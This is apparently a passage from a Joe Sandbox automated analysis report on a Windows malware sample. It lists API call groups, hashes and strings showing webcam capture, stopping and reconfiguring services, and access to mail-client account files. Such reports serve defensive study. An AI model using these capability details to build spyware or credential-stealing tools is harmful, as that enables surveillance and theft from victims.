                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: H_prologSleep
                                                                    • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                    • API String ID: 3469354165-3054508432
                                                                    • Opcode ID: ebdc6a13cc987a42b53eb931fc9213affac7e8527925a6c11aebc3df91f33466
                                                                    • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                                                    • Opcode Fuzzy Hash: ebdc6a13cc987a42b53eb931fc9213affac7e8527925a6c11aebc3df91f33466
                                                                    • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __cftoe
                                                                    • String ID:
                                                                    • API String ID: 4189289331-0
                                                                    • Opcode ID: 5e612228480a368e38a3c2cd5c9ced2759c3311217c7fd18b84c82b5e53f56ae
                                                                    • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                                                    • Opcode Fuzzy Hash: 5e612228480a368e38a3c2cd5c9ced2759c3311217c7fd18b84c82b5e53f56ae
                                                                    • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                                                    APIs
                                                                    • _strlen.LIBCMT ref: 10001607
                                                                    • _strcat.LIBCMT ref: 1000161D
                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                    • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                    • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcatlstrlen$_strcat_strlen
                                                                    • String ID:
                                                                    • API String ID: 1922816806-0
                                                                    • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                    • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                    • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                    • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                    APIs
                                                                    • lstrcatW.KERNEL32(?,?), ref: 10001038
                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$AttributesFilelstrcat
                                                                    • String ID:
                                                                    • API String ID: 3594823470-0
                                                                    • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                    • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                    • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                    • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                    APIs
                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                    • String ID:
                                                                    • API String ID: 493672254-0
                                                                    • Opcode ID: 6d957316612e9e1639687d6e998d7ab77ff57d14ab12c87d2f09a2430009e9f1
                                                                    • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                                                    • Opcode Fuzzy Hash: 6d957316612e9e1639687d6e998d7ab77ff57d14ab12c87d2f09a2430009e9f1
                                                                    • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                    • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                    • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                    • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                    • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                    • _free.LIBCMT ref: 0044824C
                                                                    • _free.LIBCMT ref: 00448274
                                                                    • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                    • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                    • _abort.LIBCMT ref: 00448293
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free$_abort
                                                                    • String ID:
                                                                    • API String ID: 3160817290-0
                                                                    • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                                    • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                                                    • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                                    • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                    • _free.LIBCMT ref: 10005B2D
                                                                    • _free.LIBCMT ref: 10005B55
                                                                    • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                    • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                    • _abort.LIBCMT ref: 10005B74
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free$_abort
                                                                    • String ID:
                                                                    • API String ID: 3160817290-0
                                                                    • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                    • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                    • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                    • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                    APIs
                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                                    • String ID:
                                                                    • API String ID: 221034970-0
                                                                    • Opcode ID: 311859fee7c9cfc71de310ff83382dc2b6c95d747b6933e344276464a171e98f
                                                                    • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                                                    • Opcode Fuzzy Hash: 311859fee7c9cfc71de310ff83382dc2b6c95d747b6933e344276464a171e98f
                                                                    • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                                                    APIs
                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                                                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                                    • String ID:
                                                                    • API String ID: 221034970-0
                                                                    • Opcode ID: 1b37a1e7eac98f1240c34f126e6a4f870ba627e83eac9c5dd9270139d563d70d
                                                                    • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                                                    • Opcode Fuzzy Hash: 1b37a1e7eac98f1240c34f126e6a4f870ba627e83eac9c5dd9270139d563d70d
                                                                    • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                                                    APIs
                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                                                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                                    • String ID:
                                                                    • API String ID: 221034970-0
                                                                    • Opcode ID: f9e3a9574bebdc31c431017d68fe9d332939c115f8ba389fbd910f6d712af4f5
                                                                    • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                                                    • Opcode Fuzzy Hash: f9e3a9574bebdc31c431017d68fe9d332939c115f8ba389fbd910f6d712af4f5
                                                                    • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe,00000104), ref: 00443475
                                                                    • _free.LIBCMT ref: 00443540
                                                                    • _free.LIBCMT ref: 0044354A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free$FileModuleName
                                                                    • String ID: @)r$C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                                                                    • API String ID: 2506810119-2873287629
                                                                    • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                                    • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                                                    • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                                    • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                                                    APIs
                                                                      • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                                                      • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                                                      • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                      • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                                    • _wcslen.LIBCMT ref: 0041B763
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                    • String ID: .exe$http\shell\open\command$program files (x86)\$program files\
                                                                    • API String ID: 3286818993-4246244872
                                                                    • Opcode ID: 9e766dfad90d1072eeebd329423a54b06a7feef5cd64e583281de775404f8260
                                                                    • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                                                    • Opcode Fuzzy Hash: 9e766dfad90d1072eeebd329423a54b06a7feef5cd64e583281de775404f8260
                                                                    • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                                                    APIs
                                                                      • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                      • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                      • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                      • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                      • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                      • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                      • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                    • API String ID: 4036392271-1520055953
                                                                    • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                    • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                    • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                    • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                                    • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleSizeSleep
                                                                    • String ID: XQG
                                                                    • API String ID: 1958988193-3606453820
                                                                    • Opcode ID: c123891714ba34b2fc86ee474269cf7d4a952ef3128b037d3b88976122030326
                                                                    • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                                                    • Opcode Fuzzy Hash: c123891714ba34b2fc86ee474269cf7d4a952ef3128b037d3b88976122030326
                                                                    • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                                                    APIs
                                                                    • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                                                    • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                                                    • GetLastError.KERNEL32 ref: 0041D580
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
